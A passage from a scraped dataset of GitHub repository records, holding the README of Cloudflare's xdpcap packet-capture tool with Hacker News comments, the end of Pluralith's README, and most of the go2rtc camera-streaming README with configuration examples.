Illustration](https://user-images.githubusercontent.com/25454503/179351981-41e991f8-a4d4-4735-b1ec-cc774bb9a4f0.png)\n\n\n \n\n## \ud83d\udcc8 Repo Activity\n\n![Alt](https://repobeats.axiom.co/api/embed/b4255b1c1484b58510be92933ccb769c885511a3.svg \"Repobeats analytics image\")\n\n \n\n## \ud83d\udcec Get In Touch\n\n- Sign up for the `alpha` over on our **[Website](https://www.pluralith.com)**\n- Join our **[Subreddit](https://www.reddit.com/r/Pluralith/)**\n- Check out our **[Roadmap](https://roadmap.pluralith.com)** and upvote features you'd like to see\n- Send a message to [Dan](https://www.linkedin.com/in/danielputzer/) or [Phi](https://www.linkedin.com/in/phiweber/) on Linkedin\n\n_Disclaimer: To properly use this CLI you **will need** the **Pluralith UI** and/or an **API key**. [Sign up](https://www.pluralith.com) for the alpha to get access!_\n\n![Subreddit subscribers](https://img.shields.io/reddit/subreddit-subscribers/pluralith?style=social)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cloudflare/xdpcap", "link": "https://github.com/cloudflare/xdpcap", "tags": [], "stars": 535, "description": "tcpdump like XDP packet capture", "lang": "Go", "repo_lang": "", "readme": "# xdpcap\n\nxdpcap is a tcpdump like tool for eXpress Data Path (XDP).\nIt can capture packets and actions / return codes from XDP programs,\nusing standard tcpdump / libpcap filter expressions.\n\n\n## Instrumentation\n\nXDP programs need to expose at least one hook point:\n\n```C\nstruct bpf_map_def xdpcap_hook = {\n\t.type = BPF_MAP_TYPE_PROG_ARRAY,\n\t.key_size = sizeof(int),\n\t.value_size = sizeof(int),\n\t.max_entries = 4, // The max value of XDP_* constants\n};\n```\n\nThis map must be [pinned inside a bpffs](https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html#bpffs).\n\n`hook.h` provides a convenience macro for declaring such maps:\n\n```\n#include \"hook.h\"\n\nstruct bpf_map_def xdpcap_hook = XDPCAP_HOOK();\n```\n\n`return XDP_*` statements should be modified to \"feed\" a hook:\n\n```C\n#include \"hook.h\"\n\nstruct bpf_map_def xdpcap_hook = XDPCAP_HOOK();\n\nint xdp_main(struct xdp_md *ctx) {\n\treturn xdpcap_exit(ctx, &xdpcap_hook, XDP_PASS);\n}\n```\n\nFor a full example, see [testdata/xdp_hook.c](testdata/xdp_hook.c).\n\nDepending on the granularity desired,\na program can expose multiple hook points,\nor a hook can be reused across programs by using the same underlying map.\n\nPackage [xdpcap](https://godoc.org/github.com/cloudflare/xdpcap) provides a wrapper for\ncreating and pinning the hook maps using the [newtools/ebpf](https://godoc.org/github.com/cilium/ebpf) loader.\n\n\n## Installation\n\n`go get -u github.com/cloudflare/xdpcap/cmd/xdpcap`\n\n\n## Usage\n\n* Capture packets to a pcap:\n`xdpcap /path/to/pinned/map dump.pcap \"tcp and port 80\"`\n\n* Display captured packets:\n`sudo xdpcap /path/to/pinned/map - \"tcp and port 80\" | sudo tcpdump -r -`\n\n\n## Limitations\n\n* filters run after the instrumented XDP program.\nIf the program modifies the packet,\nthe filter should match the modified packet,\nnot the original input packet.\n\n\n## Tests\n\n* `sudo -E $(which go) test`\n", "readme_type": "markdown", "hn_comments": "A little off topic: I love reading the cloud flare blog posts. They are always well written and super interesting. It looks like a very exciting place to work judging from what they get to work on.The tailcall and preconfigured entry points for all possible results seems excessive.I wonder if there could have been a cleaner way with an upstream patch instead.Maybe if you could add xdp filter at a given priority to make sure it runs first ?pcap files are all very well, but I want to run eBPF in the NIC and exfiltrate pcap to a user-space ring buffer. It doesn't seem like eBPF has access to the DMA bandwidth I think I need. Am I wrong?I think IPv4 ethertype should be 0x0800, not 0x8000 as depicted in the annotated flow chart. The picture is correct, the accompanying textbox is not.Fun fact, tcpdump is one of the BPF killer apps.eBPF extends the BPF with a more modern architecture (e.g. 64 bit support) and being generalized so that it can support things like more fine grained security control in seccomp which limit what commands a userspace app can call.Xdpcap seems like a logical progression of this path.this looks close to https://github.com/Netronome/bpf-samples/tree/master/xdpdump .\nI'm a cloudflare user and i really like seeing this kind of things.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "AlexxIT/go2rtc", "link": "https://github.com/AlexxIT/go2rtc", "tags": ["ffmpeg", "hassio", "home-assistant", "ngrok", "rtmp", "rtsp", "webrtc", "streaming", "h264", "webcam-streaming", "hls", "mjpeg", "homekit", "h265", "rtp", "hacktoberfest", "http-flv", "media-server", "rtsp-server", "mp4"], "stars": 535, "description": "Ultimate camera streaming application with support RTSP, RTMP, HTTP-FLV, WebRTC, MSE, HLS, MJPEG, HomeKit, FFmpeg, etc.", "lang": "Go", "repo_lang": "", "readme": "# go2rtc\n\nUltimate camera streaming application with support RTSP, WebRTC, HomeKit, FFmpeg, RTMP, etc.\n\n![](assets/go2rtc.png)\n\n- zero-dependency and zero-config [small app](#go2rtc-binary) for all OS (Windows, macOS, Linux, ARM)\n- zero-delay for many supported protocols (lowest possible streaming latency)\n- streaming from [RTSP](#source-rtsp), [RTMP](#source-rtmp), [DVRIP](#source-dvrip), [HTTP](#source-http) (FLV/MJPEG/JPEG/TS), [USB Cameras](#source-ffmpeg-device) and [other sources](#module-streams)\n- streaming from any sources, supported by [FFmpeg](#source-ffmpeg)\n- streaming to [RTSP](#module-rtsp), [WebRTC](#module-webrtc), [MSE/MP4](#module-mp4), [HLS](#module-hls) or [MJPEG](#module-mjpeg)\n- first project in the World with support streaming from [HomeKit Cameras](#source-homekit)\n- first project in the World with support H265 for WebRTC in browser (Safari only, [read more](https://github.com/AlexxIT/Blog/issues/5))\n- on the fly transcoding for unsupported codecs via [FFmpeg](#source-ffmpeg)\n- play audio files and live streams on some cameras with [speaker](#stream-to-camera)\n- multi-source 2-way [codecs negotiation](#codecs-negotiation)\n - mixing tracks from different sources to single stream\n - auto match client supported codecs\n - [2-way audio](#two-way-audio) for some cameras\n- streaming from private networks via [Ngrok](#module-ngrok)\n- can be [integrated to](#module-api) any smart home platform or be used as [standalone app](#go2rtc-binary)\n\n**Inspired by:**\n\n- series of streaming projects from [@deepch](https://github.com/deepch)\n- [webrtc](https://github.com/pion/webrtc) go library and whole [@pion](https://github.com/pion) team\n- [rtsp-simple-server](https://github.com/aler9/rtsp-simple-server) idea from [@aler9](https://github.com/aler9)\n- [GStreamer](https://gstreamer.freedesktop.org/) framework pipeline idea\n- [MediaSoup](https://mediasoup.org/) framework routing idea\n- HomeKit Accessory Protocol from [@brutella](https://github.com/brutella/hap)\n\n---\n\n* [Fast start](#fast-start)\n * [go2rtc: Binary](#go2rtc-binary)\n * [go2rtc: Docker](#go2rtc-docker)\n * [go2rtc: Home Assistant Add-on](#go2rtc-home-assistant-add-on)\n * [go2rtc: Home Assistant Integration](#go2rtc-home-assistant-integration)\n* [Configuration](#configuration)\n * [Module: Streams](#module-streams)\n * [Two way audio](#two-way-audio)\n * [Source: RTSP](#source-rtsp)\n * [Source: RTMP](#source-rtmp)\n * [Source: HTTP](#source-http)\n * [Source: FFmpeg](#source-ffmpeg)\n * [Source: FFmpeg Device](#source-ffmpeg-device)\n * [Source: Exec](#source-exec)\n * [Source: Echo](#source-echo)\n * [Source: HomeKit](#source-homekit)\n * [Source: DVRIP](#source-dvrip)\n * [Source: Tapo](#source-tapo)\n * [Source: Ivideon](#source-ivideon)\n * [Source: Hass](#source-hass)\n * [Incoming sources](#incoming-sources)\n * [Stream to camera](#stream-to-camera)\n * [Module: API](#module-api)\n * [Module: RTSP](#module-rtsp)\n * [Module: WebRTC](#module-webrtc)\n * [Module: Ngrok](#module-ngrok)\n * [Module: Hass](#module-hass)\n * [Module: MP4](#module-mp4)\n * [Module: HLS](#module-hls)\n * [Module: MJPEG](#module-mjpeg)\n * [Module: Log](#module-log)\n* [Security](#security)\n* [Codecs filters](#codecs-filters)\n* [Codecs madness](#codecs-madness)\n* [Codecs negotiation](#codecs-negotiation)\n* [Projects using go2rtc](#projects-using-go2rtc)\n* [Camera experience](#cameras-experience)\n* [TIPS](#tips)\n* [FAQ](#faq)\n\n## Fast start\n\n1. Download [binary](#go2rtc-binary) or use [Docker](#go2rtc-docker) or Home Assistant [Add-on](#go2rtc-home-assistant-add-on) or [Integration](#go2rtc-home-assistant-integration)\n2. Open web interface: `http://localhost:1984/`\n\n**Optionally:**\n\n- add your [streams](#module-streams) to [config](#configuration) file\n- setup [external access](#module-webrtc) to webrtc\n\n**Developers:**\n\n- write your own [web interface](#module-api)\n- integrate [web api](#module-api) into your smart home platform\n\n### go2rtc: Binary\n\nDownload binary for your OS from [latest release](https://github.com/AlexxIT/go2rtc/releases/):\n\n- `go2rtc_win64.zip` - Windows 64-bit\n- `go2rtc_win32.zip` - Windows 32-bit\n- `go2rtc_linux_amd64` - Linux 64-bit\n- `go2rtc_linux_i386` - Linux 32-bit\n- `go2rtc_linux_arm64` - Linux ARM 64-bit (ex. Raspberry 64-bit OS)\n- `go2rtc_linux_arm` - Linux ARM 32-bit (ex. Raspberry 32-bit OS)\n- `go2rtc_linux_mipsel` - Linux MIPS (ex. [Xiaomi Gateway 3](https://github.com/AlexxIT/XiaomiGateway3))\n- `go2rtc_mac_amd64.zip` - Mac Intel 64-bit\n- `go2rtc_mac_arm64.zip` - Mac ARM 64-bit\n\nDon't forget to fix the rights `chmod +x go2rtc_xxx_xxx` on Linux and Mac.\n\n### go2rtc: Docker\n\nContainer [alexxit/go2rtc](https://hub.docker.com/r/alexxit/go2rtc) with support `amd64`, `386`, `arm64`, `arm`. This container is the same as [Home Assistant Add-on](#go2rtc-home-assistant-add-on), but can be used separately from Home Assistant. Container has preinstalled [FFmpeg](#source-ffmpeg), [Ngrok](#module-ngrok) and [Python](#source-echo).\n\n### go2rtc: Home Assistant Add-on\n\n[![](https://my.home-assistant.io/badges/supervisor_addon.svg)](https://my.home-assistant.io/redirect/supervisor_addon/?addon=a889bffc_go2rtc&repository_url=https%3A%2F%2Fgithub.com%2FAlexxIT%2Fhassio-addons)\n\n1. Install Add-On:\n - Settings > Add-ons > Plus > Repositories > Add `https://github.com/AlexxIT/hassio-addons`\n - go2rtc > Install > Start\n2. Setup [Integration](#module-hass)\n\n### go2rtc: Home Assistant Integration\n\n[WebRTC Camera](https://github.com/AlexxIT/WebRTC) custom component can be used on any [Home Assistant installation](https://www.home-assistant.io/installation/), including [HassWP](https://github.com/AlexxIT/HassWP) on Windows. It can automatically download and use the latest version of go2rtc. Or it can connect to an existing version of go2rtc. Addon installation in this case is optional.\n\n## Configuration\n\n- by default go2rtc will search `go2rtc.yaml` in the current work dirrectory\n- `api` server will start on default **1984 port** (TCP)\n- `rtsp` server will start on default **8554 port** (TCP)\n- `webrtc` will use port **8555** (TCP/UDP) for connections\n- `ffmpeg` will use default transcoding options\n\nConfiguration options and a complete list of settings can be found in [the wiki](https://github.com/AlexxIT/go2rtc/wiki/Configuration).\n\nAvailable modules:\n\n- [streams](#module-streams)\n- [api](#module-api) - HTTP API (important for WebRTC support)\n- [rtsp](#module-rtsp) - RTSP Server (important for FFmpeg support)\n- [webrtc](#module-webrtc) - WebRTC Server\n- [mp4](#module-mp4) - MSE, MP4 stream and MP4 shapshot Server\n- [hls](#module-hls) - HLS TS or fMP4 stream Server\n- [mjpeg](#module-mjpeg) - MJPEG Server\n- [ffmpeg](#source-ffmpeg) - FFmpeg integration\n- [ngrok](#module-ngrok) - Ngrok integration (external access for private network)\n- [hass](#module-hass) - Home Assistant integration\n- [log](#module-log) - logs config\n\n### Module: Streams\n\n**go2rtc** support different stream source types. You can config one or multiple links of any type as stream source.\n\nAvailable source types:\n\n- [rtsp](#source-rtsp) - `RTSP` and `RTSPS` cameras with [two way audio](#two-way-audio) support\n- [rtmp](#source-rtmp) - `RTMP` streams\n- [http](#source-http) - `HTTP-FLV`, `MPEG TS`, `JPEG` (snapshots), `MJPEG` streams \n- [ffmpeg](#source-ffmpeg) - FFmpeg integration (`HLS`, `files` and many others)\n- [ffmpeg:device](#source-ffmpeg-device) - local USB Camera or Webcam\n- [exec](#source-exec) - advanced FFmpeg and GStreamer integration\n- [echo](#source-echo) - get stream link from bash or python\n- [homekit](#source-homekit) - streaming from HomeKit Camera\n- [dvrip](#source-dvrip) - streaming from DVR-IP NVR\n- [tapo](#source-tapo) - TP-Link Tapo cameras with [two way audio](#two-way-audio) support\n- [ivideon](#source-ivideon) - public cameras from [Ivideon](https://tv.ivideon.com/) service\n- [hass](#source-hass) - Home Assistant integration\n\nRead more about [incoming sources](#incoming-sources)\n\n#### Two way audio\n\nSupported for sources:\n\n- RTSP cameras with [ONVIF Profile T](https://www.onvif.org/specs/stream/ONVIF-Streaming-Spec.pdf) (back channel connection)\n- TP-Link Tapo cameras\n\nTwo way audio can be used in browser with [WebRTC](#module-webrtc) technology. The browser will give access to the microphone only for HTTPS sites ([read more](https://stackoverflow.com/questions/52759992/how-to-access-camera-and-microphone-in-chrome-without-https)).\n\ngo2rtc also support [play audio](#stream-to-camera) files and live streams on this cameras.\n\n#### Source: RTSP\n\n```yaml\nstreams:\n sonoff_camera: rtsp://rtsp:12345678@192.168.1.123/av_stream/ch0\n dahua_camera:\n - rtsp://admin:password@192.168.1.123/cam/realmonitor?channel=1&subtype=0&unicast=true&proto=Onvif\n - rtsp://admin:password@192.168.1.123/cam/realmonitor?channel=1&subtype=1\n amcrest_doorbell:\n - rtsp://username:password@192.168.1.123:554/cam/realmonitor?channel=1&subtype=0#backchannel=0\n unify_camera: rtspx://192.168.1.123:7441/fD6ouM72bWoFijxK\n glichy_camera: ffmpeg:rstp://username:password@192.168.1.123/live/ch00_1 \n```\n\n**Recommendations**\n\n- **Amcrest Doorbell** users may want to disable two way audio, because with an active stream you won't have a call button working. You need to add `#backchannel=0` to the end of your RTSP link in YAML config file\n- **Dahua Doorbell** users may want to change backchannel [audio codec](https://github.com/AlexxIT/go2rtc/issues/52)\n- **Unify** users may want to disable HTTPS verification. Use `rtspx://` prefix instead of `rtsps://`. And don't use `?enableSrtp` [suffix](https://github.com/AlexxIT/go2rtc/issues/81)\n- **TP-Link Tapo** users may skip login and password, because go2rtc support login [without them](https://drmnsamoliu.github.io/video.html)\n- If your camera has two RTSP links - you can add both of them as sources. This is useful when streams has different codecs, as example AAC audio with main stream and PCMU/PCMA audio with second stream\n- If the stream from your camera is glitchy, try using [ffmpeg source](#source-ffmpeg). It will not add CPU load if you won't use transcoding\n- If the stream from your camera is very glitchy, try to use transcoding with [ffmpeg source](#source-ffmpeg)\n\n#### Source: RTMP\n\nYou can get stream from RTMP server, for example [Frigate](https://docs.frigate.video/configuration/rtmp).\n\n```yaml\nstreams:\n rtmp_stream: rtmp://192.168.1.123/live/camera1\n```\n\n#### Source: HTTP\n\nSupport Content-Type:\n\n- **HTTP-FLV** (`video/x-flv`) - same as RTMP, but over HTTP\n- **HTTP-JPEG** (`image/jpeg`) - camera snapshot link, can be converted by go2rtc to MJPEG stream\n- **HTTP-MJPEG** (`multipart/x`) - simple MJPEG stream over HTTP\n- **MPEG TS** (`video/mpeg`) - legacy [streaming format](https://en.wikipedia.org/wiki/MPEG_transport_stream)\n\n```yaml\nstreams:\n # [HTTP-FLV] stream in video/x-flv format\n http_flv: http://192.168.1.123:20880/api/camera/stream/780900131155/657617\n \n # [JPEG] snapshots from Dahua camera, will be converted to MJPEG stream\n dahua_snap: http://admin:password@192.168.1.123/cgi-bin/snapshot.cgi?channel=1\n\n # [MJPEG] stream will be proxied without modification\n http_mjpeg: https://mjpeg.sanford.io/count.mjpeg\n```\n\n**PS.** Dahua camera has bug: if you select MJPEG codec for RTSP second stream - snapshot won't work.\n\n#### Source: FFmpeg\n\nYou can get any stream or file or device via FFmpeg and push it to go2rtc. The app will automatically start FFmpeg with the proper arguments when someone starts watching the stream.\n\n- FFmpeg preistalled for **Docker** and **Hass Add-on** users\n- **Hass Add-on** users can target files from [/media](https://www.home-assistant.io/more-info/local-media/setup-media/) folder\n\nFormat: `ffmpeg:{input}#{param1}#{param2}#{param3}`. Examples:\n\n```yaml\nstreams:\n # [FILE] all tracks will be copied without transcoding codecs\n file1: ffmpeg:/media/BigBuckBunny.mp4\n\n # [FILE] video will be transcoded to H264, audio will be skipped\n file2: ffmpeg:/media/BigBuckBunny.mp4#video=h264\n\n # [FILE] video will be copied, audio will be transcoded to pcmu\n file3: ffmpeg:/media/BigBuckBunny.mp4#video=copy#audio=pcmu\n\n # [HLS] video will be copied, audio will be skipped\n hls: ffmpeg:https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear5/prog_index.m3u8#video=copy\n\n # [MJPEG] video will be transcoded to H264\n mjpeg: ffmpeg:http://185.97.122.128/cgi-bin/faststream.jpg#video=h264\n\n # [RTSP] video with rotation, should be transcoded, so select H264\n rotate: ffmpeg:rtsp://rtsp:12345678@192.168.1.123/av_stream/ch0#video=h264#rotate=90\n```\n\nAll trascoding formats has [built-in templates](https://github.com/AlexxIT/go2rtc/blob/master/cmd/ffmpeg/ffmpeg.go): `h264`, `h265`, `opus`, `pcmu`, `pcmu/16000`, `pcmu/48000`, `pcma`, `pcma/16000`, `pcma/48000`, `aac`, `aac/16000`.\n\nBut you can override them via YAML config. You can also add your own formats to config and use them with source params.\n\n```yaml\nffmpeg:\n bin: ffmpeg # path to ffmpeg binary\n h264: \"-codec:v libx264 -g:v 30 -preset:v superfast -tune:v zerolatency -profile:v main -level:v 4.1\"\n mycodec: \"-any args that support ffmpeg...\"\n myinput: \"-fflags nobuffer -flags low_delay -timeout 5000000 -i {input}\"\n```\n\n- You can use `video` and `audio` params multiple times (ex. `#video=copy#audio=copy#audio=pcmu`)\n- You can use go2rtc stream name as ffmpeg input (ex. `ffmpeg:camera1#video=h264`)\n- You can use `rotate` params with `90`, `180`, `270` or `-90` values, important with transcoding (ex. `#video=h264#rotate=90`)\n- You can use `width` and/or `height` params, important with transcoding (ex. `#video=h264#width=1280`)\n- You can use `raw` param for any additional FFmpeg arguments (ex. `#raw=-vf transpose=1`)\n- You can use `input` param to override default input template (ex. `#input=rtsp/udp` will change RTSP transport from TCP to UDP+TCP)\n - You can use raw input value (ex. `#input=-timeout 5000000 -i {input}`)\n - You can add your own input templates\n\nRead more about encoding [hardware acceleration](https://github.com/AlexxIT/go2rtc/wiki/Hardware-acceleration).\n\n#### Source: FFmpeg Device\n\nYou can get video from any USB-camera or Webcam as RTSP or WebRTC stream. This is part of FFmpeg integration.\n\n- check available devices in Web interface\n- `resolution` and `framerate` must be supported by your camera!\n- for Linux supported only video for now\n- for macOS you can stream Facetime camera or whole Desktop!\n- for macOS important to set right framerate\n\n```yaml\nstreams:\n linux_usbcam: ffmpeg:device?video=0&resolution=1280x720#video=h264\n windows_webcam: ffmpeg:device?video=0#video=h264\n macos_facetime: ffmpeg:device?video=0&audio=1&resolution=1280x720&framerate=30#video=h264#audio=pcma\n```\n\n#### Source: Exec\n\nFFmpeg source just a shortcut to exec source. You can get any stream or file or device via FFmpeg or GStreamer and push it to go2rtc via RTSP protocol: \n\n```yaml\nstreams:\n stream1: exec:ffmpeg -hide_banner -re -stream_loop -1 -i /media/BigBuckBunny.mp4 -c copy -rtsp_transport tcp -f rtsp {output}\n```\n\n#### Source: Echo\n\nSome sources may have a dynamic link. And you will need to get it using a bash or python script. Your script should echo a link to the source. RTSP, FFmpeg or any of the [supported sources](#module-streams).\n\n**Docker** and **Hass Add-on** users has preinstalled `python3`, `curl`, `jq`.\n\nCheck examples in [wiki](https://github.com/AlexxIT/go2rtc/wiki/Source-Echo-examples).\n\n```yaml\nstreams:\n apple_hls: echo:python3 hls.py https://developer.apple.com/streaming/examples/basic-stream-osx-ios5.html\n```\n\n#### Source: HomeKit\n\n**Important:**\n\n- You can use HomeKit Cameras **without Apple devices** (iPhone, iPad, etc.), it's just a yet another protocol\n- HomeKit device can be paired with only one ecosystem. So, if you have paired it to an iPhone (Apple Home) - you can't pair it with Home Assistant or go2rtc. Or if you have paired it to go2rtc - you can't pair it with iPhone\n- HomeKit device should be in same network with working [mDNS](https://en.wikipedia.org/wiki/Multicast_DNS) between device and go2rtc\n\ngo2rtc support import paired HomeKit devices from [Home Assistant](#source-hass). So you can use HomeKit camera with Hass and go2rtc simultaneously. If you using Hass, I recommend pairing devices with it, it will give you more options.\n\nYou can pair device with go2rtc on the HomeKit page. If you can't see your devices - reload the page. Also try reboot your HomeKit device (power off). If you still can't see it - you have a problems with mDNS.\n\nIf you see a device but it does not have a pair button - it is paired to some ecosystem (Apple Home, Home Assistant, HomeBridge etc). You need to delete device from that ecosystem, and it will be available for pairing. If you cannot unpair device, you will have to reset it.\n\n**Important:**\n\n- HomeKit audio uses very non-standard **AAC-ELD** codec with very non-standard params and specification violation\n- Audio can be transcoded by [ffmpeg](#source-ffmpeg) source with `#async` option\n- Audio can be played by `ffplay` with `-use_wallclock_as_timestamps 1 -async 1` options\n- Audio can't be played in `VLC` and probably any other player\n\nRecommended settings for using HomeKit Camera with WebRTC, MSE, MP4, RTSP:\n\n```\nstreams:\n aqara_g3:\n - hass:Camera-Hub-G3-AB12\n - ffmpeg:aqara_g3#audio=aac#audio=opus#async\n```\n\nRTSP link with \"normal\" audio for any player: `rtsp://192.168.1.123:8554/aqara_g3?video&audio=aac`\n\n**This source is in active development!** Tested only with [Aqara Camera Hub G3](https://www.aqara.com/eu/product/camera-hub-g3) (both EU and CN versions).\n\n#### Source: DVRIP\n\nOther names: DVR-IP, NetSurveillance, Sofia protocol (NETsurveillance ActiveX plugin XMeye SDK).\n\n- you can skip `username`, `password`, `port`, `channel` and `subtype` if they are default\n- setup separate streams for different channels\n- use `subtype=0` for Main stream, and `subtype=1` for Extra1 stream\n- only the TCP protocol is supported\n\n```yaml\nstreams:\n camera1: dvrip://username:password@192.168.1.123:34567?channel=0&subtype=0\n```\n\n#### Source: Tapo\n\n[TP-Link Tapo](https://www.tapo.com/) proprietary camera protocol with **two way audio** support.\n\n- stream quality is the same as [RTSP protocol](https://www.tapo.com/en/faq/34/)\n- use the **cloud password**, this is not the RTSP password! you do not need to add a login!\n- you can also use UPPERCASE MD5 hash from your cloud password with `admin` username\n\n```yaml\nstreams:\n # cloud password without username\n camera1: tapo://cloud-password@192.168.1.123\n # admin username and UPPERCASE MD5 cloud-password hash\n camera2: tapo://admin:MD5-PASSWORD-HASH@192.168.1.123\n```\n\n#### Source: Ivideon\n\nSupport public cameras from service [Ivideon](https://tv.ivideon.com/).\n\n```yaml\nstreams:\n quailcam: ivideon:100-tu5dkUPct39cTp9oNEN2B6/0\n```\n\n#### Source: Hass\n\nSupport import camera links from [Home Assistant](https://www.home-assistant.io/) config files:\n\n- support [Generic Camera](https://www.home-assistant.io/integrations/generic/), setup via GUI\n- support [HomeKit Camera](https://www.home-assistant.io/integrations/homekit_controller/)\n\n```yaml\nhass:\n config: \"/config\" # skip this setting if you Hass Add-on user\n\nstreams:\n generic_camera: hass:Camera1 # Settings > Integrations > Integration Name\n aqara_g3: hass:Camera-Hub-G3-AB12\n```\n\nMore cameras, like [Tuya](https://www.home-assistant.io/integrations/tuya/), [ONVIF](https://www.home-assistant.io/integrations/onvif/), and possibly others can also be imported by using [this method](https://github.com/felipecrs/hass-expose-camera-stream-source#importing-home-assistant-cameras-to-go2rtc-andor-frigate).\n\n### Incoming sources\n\nBy default, go2rtc establishes a connection to the source when any client requests it. Go2rtc drops the connection to the source when it has no clients left.\n\n- Go2rtc also can accepts incoming sources in [RTSP](#source-rtsp) and [HTTP](#source-http) formats\n- Go2rtc won't stop such a source if it has no clients\n- You can push data only to existing stream (create stream with empty source in config)\n- You can push multiple incoming sources to same stream\n- You can push data to non empty stream, so it will have additional codecs inside\n\n**Examples**\n\n- RTSP with any codec\n ```yaml\n ffmpeg -re -i BigBuckBunny.mp4 -c copy -rtsp_transport tcp -f rtsp rtsp://localhost:8554/camera1\n ```\n- HTTP-MJPEG with MJPEG codec\n ```yaml\n ffmpeg -re -i BigBuckBunny.mp4 -c mjpeg -f mpjpeg http://localhost:1984/api/stream.mjpeg?dst=camera1\n ```\n- HTTP-FLV with H264, AAC codecs\n ```yaml\n ffmpeg -re -i BigBuckBunny.mp4 -c copy -f flv http://localhost:1984/api/stream.flv?dst=camera1\n ```\n- MPEG TS with H264 codec\n ```yaml\n ffmpeg -re -i BigBuckBunny.mp4 -c copy -f flv http://localhost:1984/api/stream.ts?dst=camera1\n ```\n\n#### Stream to camera\n\ngo2rtc support play audio files (ex. music or [TTS](https://www.home-assistant.io/integrations/#text-to-speech)) and live streams (ex. radio) on cameras with [two way audio](#two-way-audio) support.\n\nAPI example:\n\n```\nPOST http://localhost:1984/api/streams?dst=camera1&src=ffmpeg:http://example.com/song.mp3#audio=pcma#input=file\n```\n\n- you can stream: local files, web files, live streams or any format, supported by FFmpeg \n- you should use [ffmpeg source](#source-ffmpeg) for transcoding audio to codec, that your camera supports\n- you can check camera codecs on the go2rtc WebUI info page when the stream is active\n- some cameras support only low quality `PCMA/8000` codec (ex. [Tapo](#source-tapo))\n- it is recommended to choose higher quality formats if your camera supports them (ex. `PCMA/48000` for some Dahua cameras)\n- if you play files over http-link, you need to add `#input=file` params for transcoding, so file will be transcoded and played in real time\n- if you play live streams, you should skip `#input` param, because it is already in real time\n- you can stop active playback by calling the API with the empty `src` parameter\n- you will see one active producer and one active consumer in go2rtc WebUI info page during streaming\n\n### Module: API\n\nThe HTTP API is the main part for interacting with the application. Default address: `http://127.0.0.1:1984/`.\n\ngo2rtc has its own JS video player (`video-rtc.js`) with:\n\n- support technologies:\n - WebRTC over UDP or TCP\n - MSE or MP4 or MJPEG over WebSocket \n- automatic selection best technology according on:\n - codecs inside your stream\n - current browser capabilities\n - current network configuration\n- automatic stop stream while browser or page not active\n- automatic stop stream while player not inside page viewport\n- automatic reconnection\n\nTechnology selection based on priorities:\n\n1. Video and Audio better than just Video\n2. H265 better than H264\n3. WebRTC better than MSE, than MP4, than MJPEG\n\ngo2rtc has simple HTML page (`stream.html`) with support params in URL:\n\n- multiple streams on page `src=camera1&src=camera2...`\n- stream technology autoselection `mode=webrtc,mse,mp4,mjpeg`\n- stream technology comparison `src=camera1&mode=webrtc&mode=mse&mode=mp4`\n- player width setting in pixels `width=320px` or percents `width=50%`\n\n**Module config**\n\n- you can disable HTTP API with `listen: \"\"` and use, for example, only RTSP client/server protocol\n- you can enable HTTP API only on localhost with `listen: \"127.0.0.1:1984\"` setting\n- you can change API `base_path` and host go2rtc on your main app webserver suburl\n- all files from `static_dir` hosted on root path: `/`\n\n```yaml\napi:\n listen: \":1984\" # default \":1984\", HTTP API port (\"\" - disabled)\n username: \"admin\" # default \"\", Basic auth for WebUI\n password: \"pass\" # default \"\", Basic auth for WebUI\n base_path: \"/rtc\" # default \"\", API prefix for serve on suburl (/api => /rtc/api)\n static_dir: \"www\" # default \"\", folder for static files (custom web interface)\n origin: \"*\" # default \"\", allow CORS requests (only * supported)\n```\n\n**PS:**\n\n- go2rtc doesn't provide HTTPS. Use [Nginx](https://nginx.org/) or [Ngrok](#module-ngrok) or [Home Assistant Add-on](#go2rtc-home-assistant-add-on) for this tasks\n- MJPEG over WebSocket plays better than native MJPEG because Chrome [bug](https://bugs.chromium.org/p/chromium/issues/detail?id=527446)\n- MP4 over WebSocket was created only for Apple iOS because it doesn't support MSE and native MP4\n\n### Module: RTSP\n\nYou can get any stream as RTSP-stream: `rtsp://192.168.1.123:8554/{stream_name}`\n\nYou can enable external password protection for your RTSP streams. Password protection always disabled for localhost calls (ex. FFmpeg or Hass on same server).\n\n```yaml\nrtsp:\n listen: \":8554\" # RTSP Server TCP port, default - 8554\n username: \"admin\" # optional, default - disabled\n password: \"pass\" # optional, default - disabled\n default_query: \"video&audio\" # optional, default codecs filters \n```\n\nBy default go2rtc provide RTSP-stream with only one first video and only one first audio. You can change it with the `default_query` setting:\n\n- `default_query: \"mp4\"` - MP4 compatible codecs (H264, H265, AAC)\n- `default_query: \"video=all&audio=all\"` - all tracks from all source (not all players can handle this)\n- `default_query: \"video=h264,h265\"` - only one video track (H264 or H265)\n- `default_query: \"video&audio=all\"` - only one first any video and all audio as separate tracks\n\nRead more about [codecs filters](#codecs-filters).\n\n### Module: WebRTC\n\nWebRTC usually works without problems in the local network. But external access may require additional settings. It depends on what type of Internet do you have.\n\n- by default, WebRTC uses both TCP and UDP on port 8555 for connections\n- you can use this port for external access\n- you can change the port in YAML config:\n\n```yaml\nwebrtc:\n listen: \":8555\" # address of your local server and port (TCP/UDP)\n```\n\n**Static public IP**\n\n- forward the port 8555 on your router (you can use same 8555 port or any other as external port)\n- add your external IP-address and external port to YAML config\n\n```yaml\nwebrtc:\n candidates:\n - 216.58.210.174:8555 # if you have static public IP-address\n```\n\n**Dynamic public IP**\n\n- forward the port 8555 on your router (you can use same 8555 port or any other as the external port)\n- add `stun` word and external port to YAML config\n - go2rtc automatically detects your external address with STUN-server\n\n```yaml\nwebrtc:\n candidates:\n - stun:8555 # if you have dynamic public IP-address\n```\n\n**Private IP**\n\n- setup integration with [Ngrok service](#module-ngrok)\n\n```yaml\nngrok:\n command: ...\n```\n\n**Hard tech way 1. Own TCP-tunnel**\n\nIf you have personal [VPS](https://en.wikipedia.org/wiki/Virtual_private_server), you can create TCP-tunnel and setup in the same way as \"Static public IP\". But use your VPS IP-address in YAML config.\n\n**Hard tech way 2. Using TURN-server**\n\nIf you have personal [VPS](https://en.wikipedia.org/wiki/Virtual_private_server), you can install TURN server (e.g. [coturn](https://github.com/coturn/coturn), config [example](https://github.com/AlexxIT/WebRTC/wiki/Coturn-Example)).\n\n```yaml\nwebrtc:\n ice_servers:\n - urls: [stun:stun.l.google.com:19302]\n - urls: [turn:123.123.123.123:3478]\n username: your_user\n credential: your_pass\n```\n\n### Module: 